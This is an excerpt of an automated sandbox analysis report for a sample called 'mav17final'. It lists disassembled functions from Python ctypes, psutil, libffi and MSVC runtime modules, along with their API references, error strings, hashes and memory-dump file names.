• Opcode ID: a6aea964340cf90a23ab4a988428d36cc1078cd674b3d4c22542f756e6435465
• Instruction ID: 5fe5c5032eacaee5e87a73444e583a4d6fb87c5e930ae7796288317b59816093
• Instruction Fuzzy Hash: 1A614961A0DAC282EE569F2DA8981796BA1BF65BF0F484131DF1E467A0DF3CE447C700
APIs
• _PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B9F6BA90
• PyErr_Occurred.PYTHON311 ref: 00007FF8B9F6BAA3
  • Part of subcall function 00007FF8B9F6BA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B9F6BAE8
  • Part of subcall function 00007FF8B9F6BA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B9F6BAFF
  • Part of subcall function 00007FF8B9F6BA14: PyDict_Contains.PYTHON311 ref: 00007FF8B9F6BB27
  • Part of subcall function 00007FF8B9F6BA14: PyObject_SetAttr.PYTHON311 ref: 00007FF8B9F6BB3C
  • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BB4D
  • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BB5C
  • Part of subcall function 00007FF8B9F6BA14: PyErr_Format.PYTHON311 ref: 00007FF8B9F6BB97
  • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BBA6
  • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BBC0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Dealloc$Item$Dict_Err_Sequence_$AttrContainsErrorFormatObject_OccurredWith
• String ID: duplicate values for field %R
• API String ID: 1919794741-1910533534
• Opcode ID: f71277947be2d2287fba46fe0b915e6ba484f6932f6352b1fb4de12eb2f3b1be
• Instruction ID: 786f80bdb4a5c75d860087bdb77cf0352785d65d6b670fae0d21454ab4a0b7a2
• Instruction Fuzzy Hash: F9515E21A0DB8681EE549F6AE85857967A4BF85BF7F085231CF1E473A4EE3CE005C300
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
• String ID: iu(uuuiu)
• API String ID: 2817777535-1877708109
• Opcode ID: f3fff332be11df24bb43f445367687364f99778bf223ac6a64006d9486d4d9c8
• Instruction ID: 6533bcf5144183a18baebb441b325f9f22c620cf1e511a1661d1ec055919fe29
• Instruction Fuzzy Hash: 2D510566B04A469AEB009F69D8943AC27B0FB89BEAF045536DF0E57B58DF3CD508C310
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Err_$CheckIndex_Number_OccurredSsize_tString
• String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
• API String ID: 428023279-3643249925
• Opcode ID: 67ecbcca89311aff2d866ea192ce1f612227fb21c186869f9d79deb68ba184de
• Instruction ID: 09e76799626e496576f0ebf1f65c8b507fb8a0ddc8cc0878f2cc90994220fd99
• Instruction Fuzzy Hash: D0416E62A08BC281EE548F6ED9500B527A1FF45BFAB086532DF1D47796EE3CE885C310
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Dealloc$AttrObject_$FastLookupSequence_
• String ID: '%U' is specified in _anonymous_ but not in _fields_$_anonymous_ must be a sequence
• API String ID: 1391743325-2678605723
• Opcode ID: 7250101b7d384b3603d10181ac32ac0acd4c5aaae793a49ebea8f6d5bde9a43b
• Instruction ID: 8c7e962dd1f7a8c0d45762aa746169a407cc93bae1475575c8e7ac6685db3a92
• Instruction Fuzzy Hash: 9A413622A0DB8285EA559F2AE95017867A0FF8ABF6F086135CF0E437A0DF3CE455D300
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Object_$DeallocErr_$AttrCallCheckClearInstanceLookupRecursiveStringUnicode_
• String ID: abstract class$while processing _as_parameter_$wrong type
• API String ID: 4206935778-1173273510
• Opcode ID: 961a10382abbd73e4d2a667dfe19ccb16767b9e8d8b3bad4ce0000eff4bf0ebe
• Instruction ID: e2c207d768132ba51fbc7525303fd5e5613af1f0a0821b61143639bb13eb72a1
• Instruction Fuzzy Hash: 17411D62A0CB8282EE509F6DE8441B92760FF89BE6F186131DB0D87765DF7CE445C300
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Err_$Dict_ErrorItemOccurredWith$AttrLookupObject_$Callable_CheckLongLong_MaskSequence_StringTupleTuple_Unsigned
• String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
• API String ID: 3087875697-2538317290
• Opcode ID: c02ca58e13a46a6ce0520458656b58573f0571ee4510cffb2fc4fd828f69ccf3
• Instruction ID: ad0532cd44e96e8733dda91cb7668975a91a20ac49c346708db2324a7671ec74
• Instruction Fuzzy Hash: C8412E21A09F8292EE958F29E9403B827A0FF45BE6F586535DB4D873A5DF3CE464C310
APIs
Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$FormatMem_$Arg_CallocMemoryParseReallocStringTuplememcpy
                                                  • String ID: Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LongLong_MaskTuple_Unsigned
                                                  • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance$not a ctype instance
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_Err_ParseSizeTuple_$FormatString
                                                  • String ID: abstract class$is|Oz#$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$AllocLocal
                                                  • String ID: CallNtPowerInformation syscall failed$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Replicator::operator[]
                                                  • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                  • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallObjectObject_
                                                  • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Unicode_$ConcatDict_FromInternStringTuple_Update
                                                  • String ID: _be
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F6C4D0: _PyObject_GC_NewVar.PYTHON311(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C4E7
                                                    • Part of subcall function 00007FF8B9F6C4D0: memset.VCRUNTIME140(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C534
                                                    • Part of subcall function 00007FF8B9F6C4D0: PyObject_GC_Track.PYTHON311(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C53C
                                                  • PyErr_NoMemory.PYTHON311(?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6CE8C
                                                  • _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6CFCD
                                                    • Part of subcall function 00007FF8B9F6F698: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B9F6CE69,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6F6AD
                                                    • Part of subcall function 00007FF8B9F6F698: VirtualAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B9F6CE69,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6F6ED
                                                  • ffi_prep_cif.LIBFFI-8 ref: 00007FF8B9F6CF4E
                                                  • PyErr_Format.PYTHON311 ref: 00007FF8B9F6CF6C
                                                  • ffi_prep_closure.LIBFFI-8 ref: 00007FF8B9F6CF86
                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6CFBE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Object_$AllocDeallocFormatInfoMemoryStringSystemTrackVirtualffi_prep_cifffi_prep_closurememset
                                                  • String ID: ffi_prep_cif failed with %d$ffi_prep_closure failed with %d$invalid result type for callback function
                                                  • API String ID: 262837356-3338905684
                                                  • Opcode ID: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
                                                  • Instruction ID: 6d739d25746800365fd4dc73f1821b0fa1215ec0bad5e935133a14a9a2aabcd8
                                                  • Opcode Fuzzy Hash: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
                                                  • Instruction Fuzzy Hash: D751F522A09B8285EB548F2AE84067927B0FF59BE6F151136DB8D47764CF3CE455C380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExtendedTable
                                                  • String ID: GetExtendedUdpTable failed$GetExtendedUdpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows/socks.c
                                                  • API String ID: 2407854163-2042687678
                                                  • Opcode ID: 35cfc747fd42142dea801a501df7b154b3cf10118a4a0f8d7693ba94d07b59d1
                                                  • Instruction ID: 9fabed5a8885933d4babcae50d84a9ff6ea2f932e124253122e7b426f108fc5a
                                                  • Opcode Fuzzy Hash: 35cfc747fd42142dea801a501df7b154b3cf10118a4a0f8d7693ba94d07b59d1
                                                  • Instruction Fuzzy Hash: 8B417C35B0868282EF549F2DF4442697BA1EF987E4F088036DB4D477A5DE7CE4868B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExtendedTable
                                                  • String ID: GetExtendedTcpTable failed$GetExtendedTcpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows/socks.c
                                                  • API String ID: 2407854163-1918470230
                                                  • Opcode ID: ecf26bae23164060e8e4a53c33f2f163f6d16a6659fa752ae9be49c7f8d3077a
                                                  • Instruction ID: be2f8127d99b67ffdfd4e6a95993f37be125e1bba33a08a95d45ca8f853e999f
                                                  • Opcode Fuzzy Hash: ecf26bae23164060e8e4a53c33f2f163f6d16a6659fa752ae9be49c7f8d3077a
                                                  • Instruction Fuzzy Hash: 6F417D25B0868282EF549F2DF45426A7BA1EFA87E4F458036DB4D07765EE7CD486CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
